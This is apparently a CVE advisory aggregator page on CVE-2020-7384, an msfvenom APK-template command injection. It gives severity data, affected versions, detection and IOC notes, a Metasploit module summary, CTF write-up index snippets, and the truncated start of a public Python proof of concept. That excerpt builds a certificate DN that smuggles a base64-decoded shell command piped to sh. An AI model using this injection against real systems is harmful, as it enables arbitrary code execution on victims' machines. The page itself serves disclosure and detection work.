CVE-2020-7384
published 2020-10-29CVE-2020-7384: Rapid7's Metasploit msfvenom framework handles APK files in a way that allows for a malicious user to craft and publish a file that would execute arbitrary…
PriorityP258high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
30.56%
98.0th percentile
Rapid7's Metasploit msfvenom framework handles APK files in a way that allows for a malicious user to craft and publish a file that would execute arbitrary commands on a victim's machine.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rapid7 | metasploit | < 4.19.0 | 4.19.0 |
| rapid7 | metasploit | >= unspecified < 4.19.0 | 4.19.0 |
Detection & IOCsextracted from sources · hover to see the quote
commandmsfvenom -x <apk_file> -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null↗
- →Detect msfvenom invocations that supply a crafted APK as a template via the -x flag, particularly when the APK's certificate DN contains shell metacharacters such as a pipe '|' or backtick. ↗
- →Inspect APK certificate Distinguished Names (DN) for command injection patterns — specifically a CN field beginning with a single quote followed by a pipe character (CN='|...) which is the injection vector used by this exploit. ↗
- →Monitor for keytool and jarsigner processes spawned with a -dname argument containing shell special characters (|, $, #), as these are used to embed the malicious payload into the APK signing certificate. ↗
- →Alert on child processes (e.g., sh, bash) spawned by msfvenom or Ruby processes when processing APK template files, which would indicate successful command injection exploitation. ↗
- →Look for base64-encoded payloads piped to 'base64 -d | sh' in process command-line arguments, which is the obfuscation technique used to bypass keytool's character restrictions. ↗
- ·The exploit affects Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0 specifically; the -x template flag is the attack surface, so defenders should note this only triggers when msfvenom processes an externally supplied APK template. ↗
- ·The injection is embedded in the APK's JAR signing certificate DN field, meaning static file scanning of the APK payload itself (not the certificate metadata) will not detect the malicious content — certificate inspection is required. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Metasploit Framework 6.0.11 - msfvenom APK template command injection
exploitdb·2021-01-28·CVSS 7.0
CVE-2020-7384 [HIGH] Metasploit Framework 6.0.11 - msfvenom APK template command injection
Metasploit Framework 6.0.11 - msfvenom APK template command injection
---
# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
# Exploit Author: Justin Steven
# Vendor Homepage: https://www.metasploit.com/
# Software Link: https://www.metasploit.com/
# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
# CVE : CVE-2020-7384
#!/usr/bin/env python3
import subprocess
import tempfile
import os
from base64 import b64encode
# Change me
payload = 'echo "Code execution as $(id)" > /tmp/win'
# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"
print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()
t
Metasploit
Rapid7 Metasploit Framework msfvenom APK Template Command Injection
metasploit
Rapid7 Metasploit Framework msfvenom APK Template Command Injection
Rapid7 Metasploit Framework msfvenom APK Template Command Injection
This module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affects Metasploit Framework -x
CTF
medium / README
ctf_writeups·CVSS 9.1
[CRITICAL] medium / README
---
layout: default
title: Medium Machines
parent: Machines
nav_order: 2
description: "112+ Medium HTB machine writeups with walkthroughs"
permalink: /machines/medium/
---
# HackTheBox - Medium Machines
> Comprehensive index of retired HTB Medium-difficulty machines with key techniques and attack path summaries.
**Total: 100+ machines** | Sorted roughly by retirement date (newest first)
---
## Machine Index
| # | Machine | OS | Key Techniques | Attack Path Summary | Writeup |
|---|---------|-----|----------------|---------------------|---------|
| 1 | Signed | Linux | Code Signing Bypass, Certificate Abuse | Forge code signature to deploy malicious update, escalate via trusted binary execution | [0xdf](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) |
| 2 | Voleur | Linux | Data E
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
http://packetstormsecurity.com/files/160004/Rapid7-Metasploit-Framework-msfvenom-APK-Template-Command-Injection.htmlhttp://packetstormsecurity.com/files/161200/Metasploit-Framework-6.0.11-Command-Injection.htmlhttps://github.com/rapid7/metasploit-framework/pull/14288http://packetstormsecurity.com/files/160004/Rapid7-Metasploit-Framework-msfvenom-APK-Template-Command-Injection.htmlhttp://packetstormsecurity.com/files/161200/Metasploit-Framework-6.0.11-Command-Injection.htmlhttps://github.com/rapid7/metasploit-framework/pull/14288
2020-10-29
Published